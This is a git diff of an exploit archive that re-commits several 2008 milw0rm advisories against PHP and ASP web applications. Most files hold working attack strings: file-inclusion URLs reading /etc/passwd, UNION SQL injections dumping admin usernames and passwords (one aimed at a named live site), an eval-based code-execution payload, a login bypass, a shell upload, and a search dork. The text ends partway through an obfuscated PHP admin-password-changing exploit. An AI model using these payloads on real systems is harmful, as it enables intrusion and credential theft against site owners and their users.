include($phpbb_root_path . 'includes/functions_display.' . $phpEx); + + + + [o] Exploit + + http://localhost/[path]/portal/includes/portal_block.php?phpbb_root_path=[evilcode] + http://localhost/[path]/includes/acp/acp_lcxbbportal.php?phpbb_root_path=[evilcode] + + +============================================================================================================= + + + [o] Greetz + + MainHack BrotherHood [ http://serverisdown.org/blog/] + Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa + H312Y yooogy mousekill }^-^{ kaka11 martfella + skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke + + GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ] + + +============================================================================================================= + +# milw0rm.com [2008-12-04] 
diff --git a/platforms/php/webapps/7342.txt b/platforms/php/webapps/7342.txt index 9cc8c643d..336655def 100755 --- a/platforms/php/webapps/7342.txt +++ b/platforms/php/webapps/7342.txt @@ -1,29 +1,29 @@ -/* - - $Id: mysimpleforum-3.0-lfi.txt,v 0.1 2008/12/04 23:03:00 cOndemned Exp $ - - My Simple Forum 3.0 (index.php action) Local File Inclusion Vulnerability - Bug discovered by cOndemned - - Script download: http://drennansoft.com/index.php?action=download&id=1 - - Greetz: ZaBeaTy, str0ke, d2, TBH, Avantura - -*/ - - -Source of index.php: - - 49. if(file_exists('site/'.$_GET['action'].'.php')) { - 50. include('site/'.$_GET['action'].'.php'); - 51. } else { - - local file inclusion on line 50 - - -Proof of concept: - - http://[host]/[my_simple_forum_path]/index.php?action=../../../../../../../etc/passwd%00 - http://[host]/[my_simple_forum_path]/index.php?action=../../../../[localfile]%00 - -# milw0rm.com [2008-12-04] +/* + + $Id: mysimpleforum-3.0-lfi.txt,v 0.1 2008/12/04 23:03:00 cOndemned Exp $ + + My Simple Forum 3.0 (index.php action) Local File Inclusion Vulnerability + Bug discovered by cOndemned + + Script download: http://drennansoft.com/index.php?action=download&id=1 + + Greetz: ZaBeaTy, str0ke, d2, TBH, Avantura + +*/ + + +Source of index.php: + + 49. if(file_exists('site/'.$_GET['action'].'.php')) { + 50. include('site/'.$_GET['action'].'.php'); + 51. } else { + + local file inclusion on line 50 + + +Proof of concept: + + http://[host]/[my_simple_forum_path]/index.php?action=../../../../../../../etc/passwd%00 + http://[host]/[my_simple_forum_path]/index.php?action=../../../../[localfile]%00 + +# milw0rm.com [2008-12-04] diff --git a/platforms/php/webapps/7343.txt b/platforms/php/webapps/7343.txt index 38c4b47b0..4792329a1 100755 --- a/platforms/php/webapps/7343.txt +++ b/platforms/php/webapps/7343.txt 
@@ -1,24 +1,24 @@ -##################################################################################### -#### Joomla Component mydyngallery #### -##################################################################################### -# # -#AUTHOR : Sina Yazdanmehr (R3d.W0rm) # -#Discovered by : Sina Yazdanmehr (R3d.W0rm) # -#Our Site : Http://IRCRASH.COM # -#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi # -##################################################################################### -# # -#Download : http://mydyngallery.mon-cottenchy.fr # -# # -#DORK : inurl:option=com_mydyngallery # -# # -##################################################################################### -# [Bug] # -# # -#http://Site/[joomla_path]/index.php?option=com_mydyngallery&directory=zzz'+union+select+0,1,2,concat(0x3C703E,username,0x7c,password,0x3C2F703E),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users/* -# # -##################################################################################### -# Site : Http://IRCRASH.COM # -###################################### TNX GOD ###################################### - -# milw0rm.com [2008-12-04] +##################################################################################### +#### Joomla Component mydyngallery #### +##################################################################################### +# # +#AUTHOR : Sina Yazdanmehr (R3d.W0rm) # +#Discovered by : Sina Yazdanmehr (R3d.W0rm) # +#Our Site : Http://IRCRASH.COM # +#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi # +##################################################################################### +# # +#Download : http://mydyngallery.mon-cottenchy.fr # +# # +#DORK : inurl:option=com_mydyngallery # +# # +##################################################################################### +# [Bug] # +# # 
+#http://Site/[joomla_path]/index.php?option=com_mydyngallery&directory=zzz'+union+select+0,1,2,concat(0x3C703E,username,0x7c,password,0x3C2F703E),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users/* +# # +##################################################################################### +# Site : Http://IRCRASH.COM # +###################################### TNX GOD ###################################### + +# milw0rm.com [2008-12-04] diff --git a/platforms/php/webapps/7344.txt b/platforms/php/webapps/7344.txt index 0e1c35a12..63a3af45f 100755 --- a/platforms/php/webapps/7344.txt +++ b/platforms/php/webapps/7344.txt 
@@ -1,41 +1,41 @@ - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ Discovered by dun \ dun[at]strcpy.pl ] - - ##################################################### - # [ gravity-gtd <= 0.4.5 ] LFI/RCE Vulnerability # - ##################################################### - # - # Script: An open source list manager for tracking action items according to the principles of Getting Things Done (GTD). - # - # Download: http://sourceforge.net/projects/gravity-gtd/ - # - # [LFI] Vuln: http://site.com/gravity/library/setup/rpc.php?objectname=/../../../../../../../../etc/passwd%00 - # [RCE] Vuln: http://site.com/gravity/library/setup/rpc.php?objectname=Xmenu();phpinfo();die - # - # Bug: ./gravity-0.4.5/library/setup/rpc.php (lines: 15-20) - # - # ... - # $objectName = $_REQUEST['objectname']; - # - # - # include ("../objects/class.".strtolower($objectName).".php"); // LFI - # - # eval ('$instance = new '.$objectName.'();'); // RCE - # ... - # - # - ############################################### - # Greetz: D3m0n_DE * str0ke * and otherz.. - ############################################### - - [ dun / 2008 ] - -******************************************************************************************* - -# milw0rm.com [2008-12-04] + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. '[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ Discovered by dun \ dun[at]strcpy.pl ] + + ##################################################### + # [ gravity-gtd <= 0.4.5 ] LFI/RCE Vulnerability # + ##################################################### + # + # Script: An open source list manager for tracking action items according to the principles of Getting Things Done (GTD). 
+ # + # Download: http://sourceforge.net/projects/gravity-gtd/ + # + # [LFI] Vuln: http://site.com/gravity/library/setup/rpc.php?objectname=/../../../../../../../../etc/passwd%00 + # [RCE] Vuln: http://site.com/gravity/library/setup/rpc.php?objectname=Xmenu();phpinfo();die + # + # Bug: ./gravity-0.4.5/library/setup/rpc.php (lines: 15-20) + # + # ... + # $objectName = $_REQUEST['objectname']; + # + # + # include ("../objects/class.".strtolower($objectName).".php"); // LFI + # + # eval ('$instance = new '.$objectName.'();'); // RCE + # ... + # + # + ############################################### + # Greetz: D3m0n_DE * str0ke * and otherz.. + ############################################### + + [ dun / 2008 ] + +******************************************************************************************* + +# milw0rm.com [2008-12-04] diff --git a/platforms/php/webapps/7345.txt b/platforms/php/webapps/7345.txt index dad067b24..1eeb9e186 100755 --- a/platforms/php/webapps/7345.txt +++ b/platforms/php/webapps/7345.txt 
@@ -1,69 +1,69 @@ - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ Discovered by dun \ dun[at]strcpy.pl ] - - ########################################################### - # [ BNCwi <= 1.04 ] Local File Inclusion Vulnerability # - ########################################################### - # - # Script: "BNCwi is a Open-Source webinterface for psyBNC. - # With it you easily can manage your Bouncer via a graphical interface." - # - # Download: http://sourceforge.net/projects/bncwi/ - # - # [LFI] Vuln: http://site.com/bncwi/index.php - # - # POST /bncwi/index.php HTTP/1.1 - # - # Host: www.site.com - # User-Agent: Mozilla/5.0 - # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - # Accept-Language: pl,en-us;q=0.7,en;q=0.3 - # Accept-Encoding: gzip,deflate - # Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7 - # Keep-Alive: 300 - # Connection: keep-alive - # Content-Type: application/x-www-form-urlencoded - # Content-Length: 49 - # - # newlanguage=../../../../../../../../etc/passwd%00 - # - # HTTP/1.x 200 OK - # Date: Fri, 05 Dec 2008 01:27:15 GMT - # Server: Apache - # X-Powered-By: PHP/5.2.6-pl7-gentoo - # Keep-Alive: timeout=15, max=100 - # Connection: Keep-Alive - # Transfer-Encoding: chunked - # Content-Type: text/html - # - # Bug: ./bncwi-1.04/index.php (lines: 47-56) - # - # ... - # if(isset($_POST['newlanguage'])) - # { - # setcookie("bncwi_language", $_POST['newlanguage'], time()+60*60*24*30); - # if($_SESSION['logedin'] == "1") - # { - # mysql_query("UPDATE `$table_customers` SET `language` = '$_POST[newlanguage]' WHERE `serverid` = $_SESSION[server_id] AND BINARY `login` = '$_SESSION[USER_LOGIN]' LIMIT 1;"); - # } - # $_SESSION['language'] = $_POST['newlanguage']; - # include("lang_".$_POST['newlanguage'].".inc.php"); //LFI - # } - # ... 
- # - # - ############################################### - # Greetz: D3m0n_DE * str0ke * and otherz.. - ############################################### - - [ dun / 2008 ] - -******************************************************************************************* - -# milw0rm.com [2008-12-04] + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. '[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ Discovered by dun \ dun[at]strcpy.pl ] + + ########################################################### + # [ BNCwi <= 1.04 ] Local File Inclusion Vulnerability # + ########################################################### + # + # Script: "BNCwi is a Open-Source webinterface for psyBNC. + # With it you easily can manage your Bouncer via a graphical interface." + # + # Download: http://sourceforge.net/projects/bncwi/ + # + # [LFI] Vuln: http://site.com/bncwi/index.php + # + # POST /bncwi/index.php HTTP/1.1 + # + # Host: www.site.com + # User-Agent: Mozilla/5.0 + # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + # Accept-Language: pl,en-us;q=0.7,en;q=0.3 + # Accept-Encoding: gzip,deflate + # Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7 + # Keep-Alive: 300 + # Connection: keep-alive + # Content-Type: application/x-www-form-urlencoded + # Content-Length: 49 + # + # newlanguage=../../../../../../../../etc/passwd%00 + # + # HTTP/1.x 200 OK + # Date: Fri, 05 Dec 2008 01:27:15 GMT + # Server: Apache + # X-Powered-By: PHP/5.2.6-pl7-gentoo + # Keep-Alive: timeout=15, max=100 + # Connection: Keep-Alive + # Transfer-Encoding: chunked + # Content-Type: text/html + # + # Bug: ./bncwi-1.04/index.php (lines: 47-56) + # + # ... 
+ # if(isset($_POST['newlanguage'])) + # { + # setcookie("bncwi_language", $_POST['newlanguage'], time()+60*60*24*30); + # if($_SESSION['logedin'] == "1") + # { + # mysql_query("UPDATE `$table_customers` SET `language` = '$_POST[newlanguage]' WHERE `serverid` = $_SESSION[server_id] AND BINARY `login` = '$_SESSION[USER_LOGIN]' LIMIT 1;"); + # } + # $_SESSION['language'] = $_POST['newlanguage']; + # include("lang_".$_POST['newlanguage'].".inc.php"); //LFI + # } + # ... + # + # + ############################################### + # Greetz: D3m0n_DE * str0ke * and otherz.. + ############################################### + + [ dun / 2008 ] + +******************************************************************************************* + +# milw0rm.com [2008-12-04] diff --git a/platforms/php/webapps/7346.txt b/platforms/php/webapps/7346.txt index 189678d09..5bc981855 100755 --- a/platforms/php/webapps/7346.txt +++ b/platforms/php/webapps/7346.txt 
@@ -1,38 +1,38 @@ -================================================ - Multiple Membership Script V 2.5 SQL Injection Vulnerability -================================================ - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. Gaza Hacker Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - -AUTHOR : ViRuS_HaCkErS -Email : h8g@hotmail.com -SITE : gaza-hacker.com & hacker.ps - -##################################################### -##################################################### ---------- - Exploit ---------- -SQL Injection Vulnerability - -http://www.site.com/sitepage.php?id=-15+union+select+1,concat_ws(password,0x3a,username),3,4,5+from+affiliate_admin - -sitepage.php?id=-15+union+select+1,concat_ws(password,0x3a,username),3,4,5+from+affiliate_admin -http://www.pricelesshost.com/mmsv2/sitepage.php?id=-15+union+select+1,concat_ws(password,0x3a,username),3,4,5+from+affiliate_admin - -Login : http://www.site.com/admin - -####################################################################################### -Gaza Hacker TeaM : Le0n & Lito & cLAw & zero cod -####################################################################################### - -# milw0rm.com [2008-12-05] +================================================ + Multiple Membership Script V 2.5 SQL Injection Vulnerability +================================================ + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. Gaza Hacker Team .. 
+ `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + +AUTHOR : ViRuS_HaCkErS +Email : h8g@hotmail.com +SITE : gaza-hacker.com & hacker.ps + +##################################################### +##################################################### +--------- + Exploit +--------- +SQL Injection Vulnerability + +http://www.site.com/sitepage.php?id=-15+union+select+1,concat_ws(password,0x3a,username),3,4,5+from+affiliate_admin + +sitepage.php?id=-15+union+select+1,concat_ws(password,0x3a,username),3,4,5+from+affiliate_admin +http://www.pricelesshost.com/mmsv2/sitepage.php?id=-15+union+select+1,concat_ws(password,0x3a,username),3,4,5+from+affiliate_admin + +Login : http://www.site.com/admin + +####################################################################################### +Gaza Hacker TeaM : Le0n & Lito & cLAw & zero cod +####################################################################################### + +# milw0rm.com [2008-12-05] diff --git a/platforms/php/webapps/7351.txt b/platforms/php/webapps/7351.txt index 3cce8c188..e40bc3986 100755 --- a/platforms/php/webapps/7351.txt +++ b/platforms/php/webapps/7351.txt 
@@ -1,36 +1,36 @@ -########################################################################### -#-----------------------------OffensiveTrack------------------------------# -########################################################################### - - ----------------------------- Tunisian Muslim ------------------------------ - -#found by : OffensiveTrack -#Author : AlpHaNiX -#website : www.offensivetrack.org - -#contact : AlpHa[AT]HACKER[DOT]BZ - -########################################################################### - -#script : NightFall -#download : http://iwrite.brinkster.net/nightfall.zip - - - -#Exploits : - ---=[XSS]=-- -in the login page /login.asp write in the login fields your evil codes - - ---=[Database Disclosure]=-- -http://target.com/db/users-zza21.mdb - - - -#special thanks for syst3m and crimeirc staff - -########################################################################### - -# milw0rm.com [2008-12-05] +########################################################################### +#-----------------------------OffensiveTrack------------------------------# +########################################################################### + + +---------------------------- Tunisian Muslim ------------------------------ + +#found by : OffensiveTrack +#Author : AlpHaNiX +#website : www.offensivetrack.org + +#contact : AlpHa[AT]HACKER[DOT]BZ + +########################################################################### + +#script : NightFall +#download : http://iwrite.brinkster.net/nightfall.zip + + + +#Exploits : + +--=[XSS]=-- +in the login page /login.asp write in the login fields your evil codes + + +--=[Database Disclosure]=-- +http://target.com/db/users-zza21.mdb + + + +#special thanks for syst3m and crimeirc staff + +########################################################################### + +# milw0rm.com [2008-12-05] diff --git a/platforms/php/webapps/7352.txt b/platforms/php/webapps/7352.txt index 98cd9d482..22dcf395c 100755 
--- a/platforms/php/webapps/7352.txt +++ b/platforms/php/webapps/7352.txt @@ -1,31 +1,31 @@ -[~] Merlix Teamworx Server DD/Bypass Multiple Remote Vuln. -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] ----------------------------------------------------------- - - -exp for demo: ( DD ) - -http://demo.merlix.com/teamworx/teamworx.mdb - -exp for demo: ( Bypass ) - -http://demo.merlix.com/teamworx/default.asp - -user: ZoRLu ( or dont write anything ) - -passwd: ' or ' - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-12-05] +[~] Merlix Teamworx Server DD/Bypass Multiple Remote Vuln. +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] ----------------------------------------------------------- + + +exp for demo: ( DD ) + +http://demo.merlix.com/teamworx/teamworx.mdb + +exp for demo: ( Bypass ) + +http://demo.merlix.com/teamworx/default.asp + +user: ZoRLu ( or dont write anything ) + +passwd: ' or ' + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-12-05] diff --git a/platforms/php/webapps/7354.txt b/platforms/php/webapps/7354.txt index b714af6ae..38f5fb86f 100755 --- a/platforms/php/webapps/7354.txt +++ b/platforms/php/webapps/7354.txt 
@@ -1,22 +1,22 @@ -****(remote file upload)**** - -script: tizag-countdown_Version_3 - -*************************************************************************** -download from:http://www.tizag.com/downloads/tizag-countdown_Version_3.zip - -*************************************************************************** -www.site.com/path/index.php (upload file.php) - -shell= www.site.com/path/pics/file.php - -*************************************************** - - -Author: ahmadbady - -my mail: kivi_hacker666@yahoo.com - -*************************************************** - -# milw0rm.com [2008-12-05] +****(remote file upload)**** + +script: tizag-countdown_Version_3 + +*************************************************************************** +download from:http://www.tizag.com/downloads/tizag-countdown_Version_3.zip + +*************************************************************************** +www.site.com/path/index.php (upload file.php) + +shell= www.site.com/path/pics/file.php + +*************************************************** + + +Author: ahmadbady + +my mail: kivi_hacker666@yahoo.com + +*************************************************** + +# milw0rm.com [2008-12-05] diff --git a/platforms/php/webapps/7363.txt b/platforms/php/webapps/7363.txt index a63535540..4a5c40e6d 100755 --- a/platforms/php/webapps/7363.txt +++ b/platforms/php/webapps/7363.txt 
@@ -1,84 +1,84 @@ - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ Discovered by dun \ dun[at]strcpy.pl ] - - ################################################################## - # [ phpPgAdmin <= 4.2.1 ] Local File Inclusion Vulnerability # - ################################################################## - # - # Script: "phpPgAdmin is a web-based administration tool for PostgreSQL. It is perfect for PostgreSQL DBAs, newbies and hosting services." - # - # Script site: http://www.phppgadmin.org/ - # Download: http://phppgadmin.sourceforge.net/?page=download - # - # Vuln: http://site.com/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00 - # - # Bug: ./phpPgAdmin-4.2.1/index.php (line: 11) - # - # ... - # include_once('./libraries/lib.inc.php'); - # ... - # - # - # Bug: ./phpPgAdmin-4.2.1/libraries/lib.inc.php (lines: 22-138 -> 136) - # - # ... - # // Determine language file to import: - # // 1. Check for the language from a request var - # if (isset($_REQUEST['language']) && isset($appLangFiles[$_REQUEST['language']])) - # $_language = $_REQUEST['language']; - # - # // 2. Check for language session var - # if (!isset($_language) && isset($_SESSION['webdbLanguage']) && isset($appLangFiles[$_SESSION['webdbLanguage']])) { - # $_language = $_SESSION['webdbLanguage']; - # } - # - # // 3. 
Check for acceptable languages in HTTP_ACCEPT_LANGUAGE var - # if (!isset($_language) && $conf['default_lang'] == 'auto' && isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) { - # // extract acceptable language tags - # // (http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.4) - # preg_match_all('/\s*([a-z]{1,8}(?:-[a-z]{1,8})*)(?:;q=([01](?:.[0-9]{0,3})?))?\s*(?:,|$)/', strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']), $_m, PREG_SET_ORDER); - # foreach($_m as $_l) { // $_l[1] = language tag, [2] = quality - # if (!isset($_l[2])) $_l[2] = 1; // Default quality to 1 - # if ($_l[2] > 0 && $_l[2] <= 1 && isset($availableLanguages[$_l[1]])) { - # // Build up array of (quality => language_file) - # $_acceptLang[$_l[2]] = $availableLanguages[$_l[1]]; - # } - # } - # unset($_m); - # unset($_l); - # if (isset($_acceptLang)) { - # // Sort acceptable languages by quality - # krsort($_acceptLang, SORT_NUMERIC); - # $_language = reset($_acceptLang); - # unset($_acceptLang); - # } - # } - # - # // 4. Otherwise resort to the default set in the config file - # if (!isset($_language) && $conf['default_lang'] != 'auto' && isset($appLangFiles[$conf['default_lang']])) { - # $_language = $conf['default_lang']; - # } - # - # // Import the language file - # if (isset($_language)) { - # include("./lang/recoded/{$_language}.php"); // * LFI * - # $_SESSION['webdbLanguage'] = $_language; - # } - # ... - # - # - ############################################### - # Greetz: D3m0n_DE * str0ke * and otherz.. - ############################################### - - [ dun / 2008 ] - -******************************************************************************************* - -# milw0rm.com [2008-12-06] + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. 
'[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ Discovered by dun \ dun[at]strcpy.pl ] + + ################################################################## + # [ phpPgAdmin <= 4.2.1 ] Local File Inclusion Vulnerability # + ################################################################## + # + # Script: "phpPgAdmin is a web-based administration tool for PostgreSQL. It is perfect for PostgreSQL DBAs, newbies and hosting services." + # + # Script site: http://www.phppgadmin.org/ + # Download: http://phppgadmin.sourceforge.net/?page=download + # + # Vuln: http://site.com/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00 + # + # Bug: ./phpPgAdmin-4.2.1/index.php (line: 11) + # + # ... + # include_once('./libraries/lib.inc.php'); + # ... + # + # + # Bug: ./phpPgAdmin-4.2.1/libraries/lib.inc.php (lines: 22-138 -> 136) + # + # ... + # // Determine language file to import: + # // 1. Check for the language from a request var + # if (isset($_REQUEST['language']) && isset($appLangFiles[$_REQUEST['language']])) + # $_language = $_REQUEST['language']; + # + # // 2. Check for language session var + # if (!isset($_language) && isset($_SESSION['webdbLanguage']) && isset($appLangFiles[$_SESSION['webdbLanguage']])) { + # $_language = $_SESSION['webdbLanguage']; + # } + # + # // 3. 
Check for acceptable languages in HTTP_ACCEPT_LANGUAGE var + # if (!isset($_language) && $conf['default_lang'] == 'auto' && isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) { + # // extract acceptable language tags + # // (http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.4) + # preg_match_all('/\s*([a-z]{1,8}(?:-[a-z]{1,8})*)(?:;q=([01](?:.[0-9]{0,3})?))?\s*(?:,|$)/', strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']), $_m, PREG_SET_ORDER); + # foreach($_m as $_l) { // $_l[1] = language tag, [2] = quality + # if (!isset($_l[2])) $_l[2] = 1; // Default quality to 1 + # if ($_l[2] > 0 && $_l[2] <= 1 && isset($availableLanguages[$_l[1]])) { + # // Build up array of (quality => language_file) + # $_acceptLang[$_l[2]] = $availableLanguages[$_l[1]]; + # } + # } + # unset($_m); + # unset($_l); + # if (isset($_acceptLang)) { + # // Sort acceptable languages by quality + # krsort($_acceptLang, SORT_NUMERIC); + # $_language = reset($_acceptLang); + # unset($_acceptLang); + # } + # } + # + # // 4. Otherwise resort to the default set in the config file + # if (!isset($_language) && $conf['default_lang'] != 'auto' && isset($appLangFiles[$conf['default_lang']])) { + # $_language = $conf['default_lang']; + # } + # + # // Import the language file + # if (isset($_language)) { + # include("./lang/recoded/{$_language}.php"); // * LFI * + # $_SESSION['webdbLanguage'] = $_language; + # } + # ... + # + # + ############################################### + # Greetz: D3m0n_DE * str0ke * and otherz.. + ############################################### + + [ dun / 2008 ] + +******************************************************************************************* + +# milw0rm.com [2008-12-06] diff --git a/platforms/php/webapps/7365.php b/platforms/php/webapps/7365.php index f3caa8cba..726ffe4ac 100755 --- a/platforms/php/webapps/7365.php +++ b/platforms/php/webapps/7365.php 
@@ -1,106 +1,106 @@ -<?php -/* -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\ - -============================================================================== - DL PayCart <= 1.34 Admin Password Changing Exploit -============================================================================== - - [»] Script: [ DL PayCart ] - [»] Language: [ PHP ] - [»] homepage: [ http://www.dinkumsoft.net/ ] - [»] Type: [ Commercial ] - [»] found-report: [ 26.11.2008-02.12.2008 ] - [»] Founder.coder: [ G4N0K <mail.ganok[at]gmail.com> ] - -===[ LIVE ]=== - - [»] removed... - - - -===[ Greetz ]=== - - [»] ALLAH - [»] Tornado2800 <Tornado2800[at]gmail.com> - [»] B13 - [»] AFSHIN-ZARBAT <afshin.zarbat[at]yahoo.com> - [»] QU1E <evilinhell87[at]yahoo.com> - [»] Hussain-X <darkangel_g85[at]yahoo.com> - - //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) - //ALLAH,forgimme... -*/ - -error_reporting(E_ALL); - $G4N0K = "vVlJm6LKEv1BvWGyShZ3ISiQFKCgjDsgq5iV1yiIv/5FAlpadav6vvv66wUfmuYQw4mIE2ngGoeo". - "X8w3yzNyVrS+NA9zZFsbk7YCe2UnoWIdI1EwHVvVt7aeoIxqNTq+mP28tSRrhaR0WIeWq5MuCnZc". - "SaeYKanQ5U++27Ua5axRtshgHypeHlqNxSzuZ6zez9q4iltHQu2rnFKR2501yrItkeeGM5erI1bU". - "NNobNZbLNqqkRqssKhDRDyLjJBcXuedTfKG+3F/fFbP1dtrzulZ20mDJGWJ+PgaelSI4HysL+CzR". - "oefzqDDaaG+V0d48OkrZBVuU+Ax/wrJzwksqgzeHRf6AZbpZ90IeylIfMw61cRzbyigO9G03CfWy". - "USyQ/VxuCktHkpC+2kYa781ks6QSfctdDFEQApmuo0wwfc+4YIbvA1FYwn6ngClPQS9Ir4rQRGBP". - "pHSJdbHW+qqZa+y073CGQb265xIp1iyWbR6B3K+K2fqscUE56FipbaCUz6C3GlSgg0hXvgtnKsWT". 
- "I0uHiKFTTVxkO8XJQxdsscK9784K0LlBoqpj16gDeZXYDPi1F5yoKvOIsUqUdYlTOX0AsvrbLjE9". - "tQZ/N2iVlpESlOCznIzHwzr6EsDvQd4YYlJmvmv8DFi1xXCO5oKtZb5fZ8bSpMij38t6Cb26XOdp". - "h5ewdk/BeupladZV6DpNoBglVsY9I1YtAg89xQzfhK6Z6J7AIdFYAaIApTbsWfMP60ShCVxcRpWZ". - "vHbUi+gGLfE3Zpw6YFJqDXaLZJPIMp5bBXXgngviZ6Q4jSYKD3uF3qMc+rJJIlfqiR/X+eIZKUIa". - "yFYdVfH4m1xeiH5YKZtgV58iZlauQY43k3oJqrKMZAtsZpJ5gz185lz6sK9f8VS4HM6CMw1K80b/". - "r6sZxIg9zI1lqQhkwM/lcNYVgbvu+0H/OtoL9GS/CnyQ4mUNNgmov5dDykD/YX/MlAWWkyd9Z3ax". - "kkz+Ore+Zz5FslPhUT4q8FJKcyXwBz6t9+poV2Jr72aLY1yV+1Axn3T2XU6IcwYpxwecrPf4EHpW". - "uQa8xhWuo7xOsWe1a0aFOLfKOD/kRu4z5EFLqXsVhUvEnOtgeWQB12CzA6svhe51eeRJDtDY0W5D". - "DEEsB65UDJ9lEi/FkCfAhgySjYbE5marFjhD7+NT3MH4o56VUZLcEedNtsnPXVzZZA2/2VF/4jHE". - "bJEg8atHeLt+9vrPY8MjzR/G3+d9eBbUy9fnLBKtF+LhM+Stt2nsTRTmd3NaJHXv43fzPj5gv290". - "moOM41nv+4/73cnyNp5Fxs9vH+S4f76zH8jLv41njft49HzUbxifZKH58SxyvjT+/p39tjaXOKtU". - "QquZsLPtZEf5iUbP28H2Eh+P58D+7HQOfAY7tV5P/CTEHj2MT3r9G/v91ucX+PuND9jvD8UU/yv7". - "Df7pp9i5xs/wnmLrhg/yXXj7MqZ+ab8RX2O8nCeMw2epu2K/Jed6Uyxo/aL9zn7f5In5PX7fBoxP". - "WJbOU6wK728xhhj7Wu5v7adc8Tvie7AnO+7r3XLDFLMwR8umvPJP7LdyuFg+tyHUL3NfENmv8TPo". - "SM65vj0iwxBP/BvRhcg0xJ/47/Lf73z+aP34DVz1j8qbd22sqOUG3qQukxq+lSxjRzhIZsk7WjU2". - "26G/ka3CJ5y/AI6f+C5wA4bj0bVeX2t7xffRVph4GXD9iesYO3vgOigTUh/4d0TW7pvCow3JLgN4". - "mr29Sk3yfbfy955HZUimgQenbQA9QyzzwPfIGTXYzzog6CHW0CfEjNGHnkBphBftzu/8jPQnSTEH". - "PrUPgP8Al8g2WXDy90a3puwE+E2H5C6JeqFGillFlXqJl9AbMOgH8Jkrt/0BfKaHvEF0UzfAW2Gf". - "Jtxx85HPdQnRFzgMDTzszaJmGspnKAJutAZ7TnPGtcAnY4Vw3xvvuXHdB74lLgYWtmZxHSjWYZ2v". - "2IGD9igBXg42c/rQ4ZVd0YB9Zmnk2o9jj30MfA/SSHHgPJRtBpmKSZ5zTXTxXbWEPrCKWARrhDbe". - 